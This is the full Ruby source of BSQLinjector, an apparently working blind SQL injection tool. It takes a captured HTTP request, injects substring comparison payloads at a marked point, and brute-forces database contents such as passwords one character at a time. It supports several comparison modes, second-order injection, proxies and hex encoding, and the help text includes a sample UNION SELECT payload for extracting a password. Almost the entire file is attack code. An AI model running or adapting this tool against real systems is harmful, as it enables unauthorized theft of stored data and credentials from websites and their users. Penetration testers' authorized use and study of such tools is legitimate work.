#!/usr/bin/env ruby require 'uri' require 'net/http' require 'net/https' require 'readline' # CONFIGURE $file = "" # file with vulnerable HTTP request $secfile = "" # file with second request (2nd order) $prepend = "" # most of SQL statement $append = "" # how to end SQL statement $proto = "http" # protocol to use - http/https $proxy = "" # proxy host $proxy_port = "" # proxy port $mode = "b" # mode to use (between - b (default - this mode generates less requests), moreless - a (this mode generates less requests by comparing characters using \"<\", \">\", \"=\" characters), like - l (complete bruteforce with like), equals - e (complete bruteforce with =)) $hex = "n" # if hex should be used in comparing $max = 1000 # maximum chars to enumerate $search = "" # what is the pattern to look for when query is TRUE $for = "n" # if postgres "for" should be used in substring $comma = "n" # if comma should be URL encoded $oh = "" # this character is used when opening string when comparing $bracket = ")" # substring ending brackets $case = "n" # setting case sensitivity $hexbracket = "y" # hex delimeter - bracket (y) or space (n) $showletter = "y" # if each enumerated letter should be shown $verbose = "n" # verbose messaging $test = "n" # test mode timeout = 20 # timeout for receiving responses $sleep = 0 # sleep between requests alls = "n" # if all special characters should be included in enumeration run = 0 # parameter specifies if program should continue when always true condition is detected $i = 0 # main counter for characters # set all variables ARGV.each do |arg| $file = arg.split("=")[1] if arg.include?("--file=") $proto = "https" if arg.include?("--ssl") $proxy = arg.split("=")[1].split(":")[0] if arg.include?("--proxy=") $proxy_port = arg.split("=")[1].split(":")[1] if arg.include?("--proxy=") $verbose = "y" if arg.include?("--verbose") timeout = Integer(arg.split("=")[1]) if arg.include?("--timeout=") $comma = "y" if arg.include?("--comma") $secfile = arg.split("=")[1] if arg.include?("--2ndfile=") $max = arg.split("=")[1].to_i if arg.include?("--max=") $mode = arg.split("=")[1] if arg.include?("--mode=") $hex = "y" if arg.include?("--hex") $oh = arg.split("=")[1] if arg.include?("--schar=") $case = "y" if arg.include?("--case") $i = arg.split("=")[1].to_i - 1 if arg.include?("--start=") $test = "y" if arg.include?("--test") $for = "y" if arg.include?("--postgres") $bracket = arg.split("=")[1].to_i - 1 if arg.include?("--bracket=") alls = "y" if arg.include?("--special") $sleep = Integer(arg.split("=")[1]) if arg.include?("--sleep=") $showletter = "n" if arg.include?("--only-final") $hexbracket = "n" if arg.include?("--hexspace") $search = arg.split("=")[1] if arg.include?("--pattern=") && arg.count("=") == 1 $prepend = arg.split("=")[1] if arg.include?("--prepend=") && arg.count("=") == 1 $append = arg.split("=")[1] if arg.include?("--append=") && arg.count("=") == 1 $search = arg.split("=")[1..-1].join("=") if arg.include?("--pattern=") && arg.count("=") > 1 $prepend = arg.split("=")[1..-1].join("=") if arg.include?("--prepend=") && arg.count("=") > 1 $append = arg.split("=")[1..-1].join("=") if arg.include?("--append=") && arg.count("=") > 1 end # show main menu if ARGV.nil? || ARGV.size < 3 || $file == "" || ($search == "" && $test == "n") puts "BSQLinjector by Jakub Pa\u0142aczy\u0144ski" puts "" puts "BSQLinjector uses blind method to retrieve data from SQL databases." puts "" puts "Options:" puts " --file Mandatory - File containing valid HTTP request and SQL injection point (SQLINJECT). (--file=/tmp/req.txt)" puts " --pattern Mandatory - Pattern to look for when query is true. (--pattern=truestatement)" puts " --prepend Mandatory - Main payload. (--prepend=\"abcd\'and\'a\'=\'b\'+union+select+\'truestatement\'+from+table+where+col%3d\'value\'+and+substr(password,\"" puts " --append How to end our payload. For example comment out rest of SQL statement. (--append=\'#)" puts " --schar Character placed around chars. This character is not used while in hex mode. (--schar=\"\'\")" puts " --2ndfile File containing valid HTTP request used in second order exploitation. (--2ndfile=/tmp/2ndreq.txt)" puts "" puts " --mode Blind mode to use - (between - b (generates less requests), moreless - a (generates less requests by using \"<\", \">\", \"=\" characters), like - l (complete bruteforce), equals - e (complete bruteforce)). (--mode=l)" puts " --postgres Use postgres \"for\" in substring function." puts " --hex Use hex to compare instead of characters." puts " --case Case sensitivity." puts "" puts " --ssl Use SSL." puts " --proxy Proxy to use. (--proxy=127.0.0.1:8080)" puts "" puts " --test Enable test mode. Do not send request, just show full payload." puts " --special Include all special characters in enumeration." puts " --start Start enumeration from specified character. (--start=10)" puts " --max Maximum characters to enumerate. (--max=10)" puts " --timeout Timeout in waiting for responses. (--timeout=20)" puts " --sleep Sleep between requests. (--sleep=5)" puts " --only-final Stop showing each enumerated letter." puts " --comma Encode comma." puts " --bracket Add brackets to the end of substring function. --bracket=\"))\"" puts " --hexspace Use space instead of brackets to split hex values." puts " --verbose Show verbose messages." puts "" puts "Example usage:" puts " ruby #{__FILE__} --pattern=truestatement --file=/tmp/req.txt --schar=\"'\" --prepend=\"abcd\'and\'a\'=\'b\'+union+select+\'truestatement\'+from+table+where+col%3d\'value\'+and+substr(password,\" --append=\"\'#\" --ssl" puts "" exit(1) else puts "BSQLinjector by Jakub Pa\u0142aczy\u0144ski" puts "" end # EXECUTION # holds HTTP responses $response = "" # arrays for Blind exploitation $arrs = [",", "_", "."] if alls == "y" $arrs += ["+", "/", "=", ":", "-", "!", "@", "#", "$", "%", "^", "&", "*", "(", ")", "~", "`", "[", "]", "{", "}", ";", "<", ">", "?", "|", "\\", "\""] end $arrn1 = ["0", "1", "2", "3", "4"] $arrn2 = ["5", "6", "7", "8", "9"] $arr1 = ["a", "b", "c"] $arr2 = ["d", "e", "f"] $arr3 = ["g", "h", "i"] $arr4 = ["j", "k", "l", "m"] $arr5 = ["n", "o", "p"] $arr6 = ["q", "r", "s"] $arr7 = ["t", "u", "v"] $arr8 = ["w", "x", "y", "z"] # for case sensitive $arr9 = ["A", "B", "C"] $arr10 = ["D", "E", "F"] $arr11 = ["G", "H", "I"] $arr12 = ["J", "K", "L", "M"] $arr13 = ["N", "O", "P"] $arr14 = ["Q", "R", "S"] $arr15 = ["T", "U", "V"] $arr16 = ["W", "X", "Y", "Z"] $arrays = $arr1 + $arr2 + $arr3 + $arr4 + $arr5 + $arr6 + $arr7 + $arr8 + $arrn1 + $arrn2 + $arrs $arraysc = $arr1 + $arr2 + $arr3 + $arr4 + $arr5 + $arr6 + $arr7 + $arr8 + $arr9 + $arr10 + $arr11 + $arr12 + $arr13 + $arr14 + $arr15 + $arr16 + $arrn1 + $arrn2 + $arrs # other parameters $result = "" ### Processing Request File ### # Configure basic options # set proxy if $proxy == "" $proxy = nil $proxy_port = nil end if $hex == "y" $oh = "" end # get connection host and port z = 1 loop do begin break if File.readlines($file)[z].chomp.empty? if File.readlines($file)[z].include?("Host: ") $remote = File.readlines($file)[z].split(" ")[1] if $proto == "http" $port = 80 else $port = 443 end if $remote.include?(":") $port = $remote.split(":")[1] $remote = $remote.split(":")[0] end end rescue puts "[-] Wrong HTTP file format." exit(1) end z = z + 1 end if $remote == "" puts "[-] Cannot retrieve hostname." exit(1) end # Configure main request def configreq(chars) # test mode if $test == "y" puts "Payload example:" if $comma == "y" puts $prepend + $i.to_s + "%2C1" + $bracket + chars.gsub("%", "%25").gsub("&", "%26").gsub("+", "%2B").gsub(";", "%3B").gsub("#", "%23").gsub(" ", "+") + $append else if $for == "n" puts $prepend + $i.to_s + ",1" + $bracket + chars.gsub("%", "%25").gsub("&", "%26").gsub("+", "%2B").gsub(";", "%3B").gsub("#", "%23").gsub(" ", "+") + $append else puts $prepend + $i.to_s + " for 1" + $bracket + chars.gsub("%", "%25").gsub("&", "%26").gsub("+", "%2B").gsub(";", "%3B").gsub("#", "%23").gsub(" ", "+") + $append end end exit(1) end # check HTTP method if File.readlines($file)[0].include?("GET ") $method = "get" else $method = "post" end found = 0 # for detecting injected payload # get URI path $uri = File.readlines($file)[0].split(" ")[1] turi = URI.decode($uri).gsub("+", " ") if turi.include?("SQLINJECT") if $comma == "y" $uri = $uri.sub("SQLINJECT", $prepend + $i.to_s + "%2C1" + $bracket + chars.gsub("%", "%25").gsub("&", "%26").gsub("+", "%2B").gsub(";", "%3B").gsub("#", "%23").gsub(" ", "+") + $append) else if $for == "n" $uri = $uri.sub("SQLINJECT", $prepend + $i.to_s + ",1" + $bracket + chars.gsub("%", "%25").gsub("&", "%26").gsub("+", "%2B").gsub(";", "%3B").gsub("#", "%23").gsub(" ", "+") + $append) else $uri = $uri.sub("SQLINJECT", $prepend + $i.to_s + " for 1" + $bracket + chars.gsub("%", "%25").gsub("&", "%26").gsub("+", "%2B").gsub(";", "%3B").gsub("#", "%23").gsub(" ", "+") + $append) end end found = found + 1 end # get headers i = 1 $headers = Hash.new loop do break if File.readlines($file)[i].chomp.empty? if !File.readlines($file)[i].include?("Host: ") header = File.readlines($file)[i].chomp if header.include?("SQLINJECT") if $comma == "y" header = header.sub("SQLINJECT", $prepend + $i.to_s + "%2C1" + $bracket + chars.gsub("%", "%25").gsub("&", "%26").gsub("+", "%2B").gsub(";", "%3B").gsub("#", "%23").gsub(" ", "+") + $append) else if $for == "n" header = header.sub("SQLINJECT", $prepend + $i.to_s + ",1" + $bracket + chars.gsub("%", "%25").gsub("&", "%26").gsub("+", "%2B").gsub(";", "%3B").gsub("#", "%23").gsub(" ", "+") + $append) else header = header.sub("SQLINJECT", $prepend + $i.to_s + " for 1" + $bracket + chars.gsub("%", "%25").gsub("&", "%26").gsub("+", "%2B").gsub(";", "%3B").gsub("#", "%23").gsub(" ", "+") + $append) end end found = found + 1 end if header.include?("Accept-Encoding") else $headers[header.split(": ")[0]] = header.split(": ")[1] end end i = i + 1 end # get POST body i = i + 1 $post = "" postfind = 0 if $method == "post" loop do break if File.readlines($file)[i].nil? postline = File.readlines($file)[i] tline = postline.gsub("+", " ") if tline.include?("SQLINJECT") if $comma == "y" postline = postline.sub("SQLINJECT", $prepend + $i.to_s + "%2C1" + $bracket + chars.gsub("%", "%25").gsub("&", "%26").gsub("+", "%2B").gsub(";", "%3B").gsub("#", "%23").gsub(" ", "+") + $append) else if $for == "n" postline = postline.sub("SQLINJECT", $prepend + $i.to_s + ",1" + $bracket + chars.gsub("%", "%25").gsub("&", "%26").gsub("+", "%2B").gsub(";", "%3B").gsub("#", "%23").gsub(" ", "+") + $append) else postline = postline.sub("SQLINJECT", $prepend + $i.to_s + " for 1" + $bracket + chars.gsub("%", "%25").gsub("&", "%26").gsub("+", "%2B").gsub(";", "%3B").gsub("#", "%23").gsub(" ", "+") + $append) end end found = found + 1 end $post += postline i = i + 1 end end # update Content-Length header if $method == "post" $headers["Content-Length"] = String($post.bytesize) end # detect injection point if found == 0 puts "[-] Please specify injection point. Put \"SQLINJECT\" in place where payload should be injected." exit(1) elsif found > 1 puts "[-] Multiple instances of injection point found. Please specify only one injection point." exit(1) end # configuring request $request = Net::HTTP.new($remote, $port, $proxy, $proxy_port) # set HTTPS if $proto == "https" $request.use_ssl = true $request.verify_mode = OpenSSL::SSL::VERIFY_NONE end end ### End of Processing Request File ### ### Configure request for 2nd order case ### if $secfile != "" # check HTTP method if File.readlines($secfile)[0].include?("GET ") $secmethod = "get" else $secmethod = "post" end # get URI path $securi = File.readlines($secfile)[0].split(" ")[1] # get headers y = 1 $secheaders = Hash.new loop do break if File.readlines($secfile)[y].chomp.empty? if !File.readlines($secfile)[y].include?("Host: ") header = File.readlines($secfile)[y].chomp if header.include?("Accept-Encoding") else $secheaders[header.split(": ")[0]] = header.split(": ")[1] end end y = y + 1 end # get POST body y = y + 1 $secpost = "" if $method == "post" loop do break if File.readlines($secfile)[y].nil? postline = File.readlines($secfile)[y] $secpost += postline y = y + 1 end end # configuring 2nd request $secrequest = Net::HTTP.new($remote, $port, $proxy, $proxy_port) # set HTTPS if $proto == "https" $secrequest.use_ssl = true $secrequest.verify_mode = OpenSSL::SSL::VERIFY_NONE end end ### End of Processing 2nd Request File ### # Sending request def sendreq() if $sleep != 0 sleep($sleep) end if $verbose == "y" puts "[+] Sending request:" if $proto == "http" puts "http://#{$remote}:#{$port}#{$uri}" puts $headers puts "\n" puts $post puts "\n" else puts "https://#{$remote}:#{$port}#{$uri}" puts $headers puts "\n" puts $post puts "\n" end end $response = "" $request.start { |r| begin status = Timeout::timeout($time) { if $method == "post" $response = r.post($uri, $post, $headers) else $response = r.get($uri, $headers) end } rescue Timeout::Error end } end # Sending second request def send2ndreq() if $verbose == "y" puts "[+] Sending second request:" if $proto == "http" puts "http://#{$remote}:#{$port}#{$securi}" puts $secheaders puts "\n" puts $secpost puts "\n" else puts "https://#{$remote}:#{$port}#{$securi}" puts $secheaders puts "\n" puts $secpost puts "\n" end end $response = "" $secrequest.start { |r| begin status = Timeout::timeout($time) { if $method == "post" $response = r.post($securi, $secpost, $secheaders) else $response = r.get($securi, $secheaders) end } rescue Timeout::Error end } end # create between payload def cbetween(a, b, c) if $hex == "y" if $for == "y" configreq("between" + " chr(" + a.ord.to_s + ")and chr(" + b.ord.to_s + ")") elsif $hexbracket == "n" configreq("between" + " 0x" + a.unpack('H*')[0] + " and " + "0x" + b.unpack('H*')[0]) else configreq("between" + "(0x" + a.unpack('H*')[0] + ")and(" + "0x" + b.unpack('H*')[0] + ")") end else configreq("between" + $oh + a + $oh + "and" + $oh + b) end sendreq() send2ndreq() if $secfile != "" $fheader = "n" $response.to_hash.each { |k,v| $fheader = "y" if k.to_s.include?($search) $fheader = "y" if v.to_s.include?($search) } if ($response.body.include?($search) || $fheader == "y") && c == "yes" $result = $result + a puts "[+] Letter " + $i.to_s + " found: " + a if $showletter == "y" $letter = 1 end end # creating moreless payload def cmoreless(a, b, c) if $hex == "y" if $for == "y" configreq(a + " chr(" + a.ord.to_s + ")") elsif $hexbracket == "n" configreq(a + " 0x" + b.unpack('H*')[0]) else configreq(a + "(0x" + b.unpack('H*')[0] + ")") end else configreq(a + $oh + b) end sendreq() send2ndreq() if $secfile != "" $fheader = "n" $response.to_hash.each { |k,v| $fheader = "y" if k.to_s.include?($search) $fheader = "y" if v.to_s.include?($search) } if ($response.body.include?($search) || $fheader == "y") && c == "yes" $result = $result + b puts "[+] Letter " + $i.to_s + " found: " + b if $showletter == "y" $letter = 1 end end # creating like payload def clike(a) if $hex == "y" if $for == "y" configreq("like" + " " + "chr(" + a.ord.to_s + ")") elsif $hexbracket == "n" configreq("like" + " " + "0x" + a.unpack('H*')[0]) else configreq("like" + "(" + "0x" + a.unpack('H*')[0] + ")") end else configreq("like" + $oh + a) end sendreq() send2ndreq() if $secfile != "" $fheader = "n" $response.to_hash.each { |k,v| $fheader = "y" if k.to_s.include?($search) $fheader = "y" if v.to_s.include?($search) } if $response.body.include?($search) || $fheader == "y" $result = $result + a puts "[+] Letter " + $i.to_s + " found: " + a if $showletter == "y" $letter = 1 end end # creating equal payload def cequal(a) if $hex == "y" if $for == "y" configreq("=" + "chr(" + a.ord.to_s + ")") elsif $hexbracket == "n" configreq("=" + "0x" + a.unpack('H*')[0]) else configreq("=" + "(0x" + a.unpack('H*')[0] + ")") end else configreq("=" + $oh + a) end sendreq() send2ndreq() if $secfile != "" $fheader = "n" $response.to_hash.each { |k,v| $fheader = "y" if k.to_s.include?($search) $fheader = "y" if v.to_s.include?($search) } if $response.body.include?($search) || $fheader == "y" $result = $result + a puts "[+] Letter " + $i.to_s + " found: " + a if $showletter == "y" $letter = 1 end end # do enumeration until $i >= $max do $i = $i + 1 $letter = 0 if $result == "aaaaa" && run == 0 puts "[-] It seems like your payload gives always true condition. Maybe you should try another parameter\'s value or different payload. Quit (Y/N)?\n" choice = Readline.readline("> ", true) if choice == "y" || choice == "Y" break else run = 1 end end if $mode == "e" if $case == "n" for ch in $arrays cequal(ch) if $letter == 1 break end end else for ch in $arraysc cequal(ch) if $letter == 1 break end end end elsif $mode == "l" if $case == "n" for ch in $arrays if ch != "%" && ch != "_" clike(ch) if $letter == 1 break end else cequal(ch) if $letter == 1 break end end end else for ch in $arraysc if ch != "%" && ch != "_" clike(ch) if $letter == 1 break end else cequal(ch) if $letter == 1 break end end end end elsif $mode == "b" # lowercase cbetween("a", "z", "no") if $response.body.include?($search) || $fheader == "y" cbetween("a", "m", "no") if $response.body.include?($search) || $fheader == "y" cbetween("a", "f", "no") if $response.body.include?($search) || $fheader == "y" cbetween("a", "c", "no") if $response.body.include?($search) || $fheader == "y" for ch in $arr1 cbetween(ch, ch, "yes") if $letter == 1 break end end else for ch in $arr2 cbetween(ch, ch, "yes") if $letter == 1 break end end end else cbetween("g", "i", "no") if $response.body.include?($search) || $fheader == "y" for ch in $arr3 cbetween(ch, ch, "yes") if $letter == 1 break end end else for ch in $arr4 cbetween(ch, ch, "yes") if $letter == 1 break end end end end else cbetween("n", "s", "no") if $response.body.include?($search) || $fheader == "y" cbetween("n", "p", "no") if $response.body.include?($search) || $fheader == "y" for ch in $arr5 cbetween(ch, ch, "yes") if $letter == 1 break end end else for ch in $arr6 cbetween(ch, ch, "yes") if $letter == 1 break end end end else cbetween("t", "v", "no") if $response.body.include?($search) || $fheader == "y" for ch in $arr7 cbetween(ch, ch, "yes") if $letter == 1 break end end else for ch in $arr8 cbetween(ch, ch, "yes") if $letter == 1 break end end end end end end # uppercase - only when case-sensitive specified if $case == "y" && $letter == 0 cbetween("A", "Z", "no") if $response.body.include?($search) || $fheader == "y" cbetween("A", "M", "no") if $response.body.include?($search) || $fheader == "y" cbetween("A", "F", "no") if $response.body.include?($search) || $fheader == "y" cbetween("A", "C", "no") if $response.body.include?($search) || $fheader == "y" for ch in $arr9 cbetween(ch, ch, "yes") if $letter == 1 break end end else for ch in $arr10 cbetween(ch, ch, "yes") if $letter == 1 break end end end else cbetween("G", "I", "no") if $response.body.include?($search) || $fheader == "y" for ch in $arr11 cbetween(ch, ch, "yes") if $letter == 1 break end end else for ch in $arr12 cbetween(ch, ch, "yes") if $letter == 1 break end end end end else cbetween("N", "S", "no") if $response.body.include?($search) || $fheader == "y" cbetween("N", "P", "no") if $response.body.include?($search) || $fheader == "y" for ch in $arr13 cbetween(ch, ch, "yes") if $letter == 1 break end end else for ch in $arr14 cbetween(ch, ch, "yes") if $letter == 1 break end end end else cbetween("T", "V", "no") if $response.body.include?($search) || $fheader == "y" for ch in $arr15 cbetween(ch, ch, "yes") if $letter == 1 break end end else for ch in $arr16 cbetween(ch, ch, "yes") if $letter == 1 break end end end end end end end # numeric if $letter == 0 cbetween("0", "9", "no") if $response.body.include?($search) || $fheader == "y" cbetween("0", "4", "no") if $response.body.include?($search) || $fheader == "y" for ch in $arrn1 cbetween(ch, ch, "yes") if $letter == 1 break end end else for ch in $arrn2 cbetween(ch, ch, "yes") if $letter == 1 break end end end end end # special character if $letter == 0 for ch in $arrs cbetween(ch, ch, "yes") if $letter == 1 break end end end elsif $mode == "a" # lowercase cmoreless(">=", "a", "no") if $response.body.include?($search) || $fheader == "y" cmoreless("<=", "m", "no") if $response.body.include?($search) || $fheader == "y" cmoreless("<=", "f", "no") if $response.body.include?($search) || $fheader == "y" cmoreless("<=", "c", "no") if $response.body.include?($search) || $fheader == "y" for ch in $arr1 cmoreless("=", ch, "yes") if $letter == 1 break end end else for ch in $arr2 cmoreless("=", ch, "yes") if $letter == 1 break end end end else cmoreless("<=", "i", "no") if $response.body.include?($search) || $fheader == "y" for ch in $arr3 cmoreless("=", ch, "yes") if $letter == 1 break end end else for ch in $arr4 cmoreless("=", ch, "yes") if $letter == 1 break end end end end else cmoreless("<=", "s", "no") if $response.body.include?($search) || $fheader == "y" cmoreless("<=", "p", "no") if $response.body.include?($search) || $fheader == "y" for ch in $arr5 cmoreless("=", ch, "yes") if $letter == 1 break end end else for ch in $arr6 cmoreless("=", ch, "yes") if $letter == 1 break end end end else cmoreless("<=", "v", "no") if $response.body.include?($search) || $fheader == "y" for ch in $arr7 cmoreless("=", ch, "yes") if $letter == 1 break end end else for ch in $arr8 cmoreless("=", ch, "yes") if $letter == 1 break end end end end end end # uppercase - only when case-sensitive specified if $case == "y" && $letter == 0 cmoreless(">=", "A", "no") if $response.body.include?($search) || $fheader == "y" cmoreless("<=", "M", "no") if $response.body.include?($search) || $fheader == "y" cmoreless("<=", "F", "no") if $response.body.include?($search) || $fheader == "y" cmoreless("<=", "C", "no") if $response.body.include?($search) || $fheader == "y" for ch in $arr9 cmoreless("=", ch, "yes") if $letter == 1 break end end else for ch in $arr10 cmoreless("=", ch, "yes") if $letter == 1 break end end end else cmoreless("<=", "I", "no") if $response.body.include?($search) || $fheader == "y" for ch in $arr11 cmoreless("=", ch, "yes") if $letter == 1 break end end else for ch in $arr12 cmoreless("=", ch, "yes") if $letter == 1 break end end end end else cmoreless("<=", "S", "no") if $response.body.include?($search) || $fheader == "y" cmoreless("<=", "P", "no") if $response.body.include?($search) || $fheader == "y" for ch in $arr13 cmoreless("=", ch, "yes") if $letter == 1 break end end else for ch in $arr14 cmoreless("=", ch, "yes") if $letter == 1 break end end end else cmoreless("<=", "V", "no") if $response.body.include?($search) || $fheader == "y" for ch in $arr15 cmoreless("=", ch, "yes") if $letter == 1 break end end else for ch in $arr16 cmoreless("=", ch, "yes") if $letter == 1 break end end end end end end end # numeric if $letter == 0 cmoreless(">=", "0", "no") if $response.body.include?($search) || $fheader == "y" cmoreless("<=", "4", "no") if $response.body.include?($search) || $fheader == "y" for ch in $arrn1 cmoreless("=", ch, "yes") if $letter == 1 break end end else for ch in $arrn2 cmoreless("=", ch, "yes") if $letter == 1 break end end end end end # special character if $letter == 0 for ch in $arrs cmoreless("=", ch, "yes") if $letter == 1 break end end end end # printing results if $letter == 0 if $result == "" puts "[-] No results. Probably wrong pattern." break else puts "\n[+] Full result:\n" + $result break end end end # means that there are still chars to enumerate if $letter == 1 puts "\n[-] Retreving not finished:\n" + $result end